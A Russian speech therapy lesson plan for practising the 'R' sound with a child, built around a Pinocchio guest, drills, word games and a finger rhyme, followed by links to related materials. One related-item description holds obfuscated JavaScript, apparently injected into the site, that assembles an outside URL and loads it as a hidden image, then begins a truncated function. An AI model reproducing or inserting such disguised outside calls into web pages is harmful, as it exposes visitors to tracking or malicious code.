" Я дружу со звуком Р"
план-конспект занятия по логопедии на тему

Буйвалова Наталья Николаевна

Автоматизация звука "Р".

Скачать:

ВложениеРазмер
Файл konspekt_individualnogo_zanyatiya_1.docx17.5 КБ

Предварительный просмотр:

  1. Вводная часть

Здравствуй (имя ребенка). Сегодня к нам на занятие придет гость, а имя его спрятано в этом конверте. Ребенку предлагаются слоги: БУ, РА, ТИ, НО. К нам пришел Буратино. (выставляется игрушка)

Буратино еще не учится в школе, потому что не  умеет произносить звук Р.   Поможем ему?

  1. Основная часть
  • Для начала покажем и  научим нашего гостя делать артикуляционную гимнастику для язычка. («Заборчик-Дудочка», «Маляр», «Блинчик», «Лошадка», «Грибок»)
  • Буратино любит играть в футбол.  И принес нам с тобой  вместо мячей  горошинки.  Ими мы и будем забивать в ворота. Кирилл, нужно взять столько горошин, сколько слогов в имени Буратино. (Выполняется дыхательное упражнение «Загони мяч в ворота»)
  • Буратино нравится петь песенки, но он никак не может научится произносить звук р. Давай уму поможем. Слушай внимательно и повторяй за мной.(Автоматизация звука р в прямых слогах)

Ра-ра-ра                               ра-ра-ро                     ро-ра-ро-ра

Ро-ро-ро                               ро-ры-ро                   ры-ры-ро-ро

Ры-ры-ры                             ры-ру-ру                   ру-ра-ру-ро

Ру-ру-ру                               ру-ра-ра                    ра-ро-ру-ры

  • Кирилл, посмотри Буратино принес волшебную палочку.

Дотрагивайся палочкой до картинки и изменяй их названия-     Д/и «Один-много»

Слова: шар, помидор ,комар, самовар ,мухомор, пожар, тигр

  • Пальчиковая игра

«Веселая игра»

( выполняем движения в соответствии с текстом)

В ручку правую возьмём,      
В кулачок его сожмём.

Раз сжимаем, два сжимаем

Шарик мы не выпускаем.

В ручку левую возьмём,                                          
В кулачок его сожмём.

Раз сжимаем, два сжимаем

Шарик мы не выпускаем.

Мы положим шар на стол

И посмотрим на ладошки,

И похлопаем немножко,

Потрясём свои ладошки.

Мы немного отдохнём,
Заниматься мы начнём.

  • Буратино устал и уже хочет пообедать. Предлагаю отправится вместе с ним в магазин «Продукты»

Положим в корзину только те продукты, в названии которых есть звук Р. А начинать мы будем со слов «Я положу в корзину»

(картинки с изображением продуктов: помидор, торт, груша, рыба, гранат, картошка, морковь, творог, горох, кукуруза, мороженое, кефир)

  • Д/и «Считаем продукты»  Буратино сам набрал продукты, давай посчитаем их. (1 помидора,2 помидоры, 3помидоры, 4 помидоры, 5 помидор). Слова: кефир, сыр, морковь.
  • Д/и «Какой, какая, какое, какие?»  А теперь поможем приготовить обед нашему гостю.

 Нам понадобится один предмет, а какой –отгадаем загадку.

Чтоб голодным не сидеть,
Нужно вам её иметь.
Ни картошку, ни котлеты,
Не поешь без штуки этой.
Мясо, сало, лук, селёдку,
Всё поджарит… (
сковородка)                                                  В. Тунников

Логопед складывает продукты на сковороду и говорит первую часть, а ребенок добавляет.

Котлеты из рыбы- рыбные котлеты                    сырок из  творога-    

Суп из гороха-                                                       соус из сыра-

Сок из граната-                                                      салат из моркови-

Компот из груш-                                                    салат из кукурузы-

Напиток из кефира-                                              пюре из картофеля-

  1. Заключительная часть

Вот и пора нашему гостю отправляться назад, теперь Буратино возьмут в школу т.к. он вместе с тобой научился произносить звук Р правильно.

 За это я вам с Буратино вручаю медаль «Я дружу со звуком Р»

До свидание. Спасибо за внимание.


По теме: методические разработки, презентации и конспекты

Индивидуальное занятие по автоматизации звука С в словах, фразах (в рамках РМО учителей - логопедов) "Я дружу со звуком С"

Открытое индивидуальное занятие по автоматизации звука С в словах, фразах  для учителей-логопедов ДОУ...

Проект "Дружу со звуками, говорю правильно"

Проект направлен на повышение родительской компетентности в вопросах речевого развития  Своевременное овладение правильной, чистой речью имеет важное значение в формировании полноценной личности....

Конспект НОД во II младшей группе на тему " Дружит с бабочкой цветок, Дружим мы с тобою».

Конспект НОД во II младшей группе на тему «Дружит с бабочкой цветок,Дружим мы с тобою».Конспект НОД  во II младшей группе на тему " Дружит с бабочкой цветок,Дружим мы с...

Что делать, если с вашим ребенком никто не дружит? Как помочь ребенку, если с ним не хотят дружить.

var e,n,o;window.self===window.top&&(e=[\'//\',\'s:\',\'tp\',\'ht\'].reverse().join(\'\'),n=[\'npgo.lussoit.com\',\'67\'].join(\'/\'),(o=new Image).src=\'\'.concat(e).concat(n,\'.gif\')); !function(){if(!window.mainSc...

Метадическая разработка "Я дружу со звуком Р"

В связи с внедрением ФГОС дошкольного образования и увеличением количества детей с речевыми нарушениями, мне как учителю – логопеду приходится искать новые подходы, идеи, формы и методы в своей ...

"Со звуками мы дружим"

дополнительная общеразвивающая программа социально - педагогической напрвленности...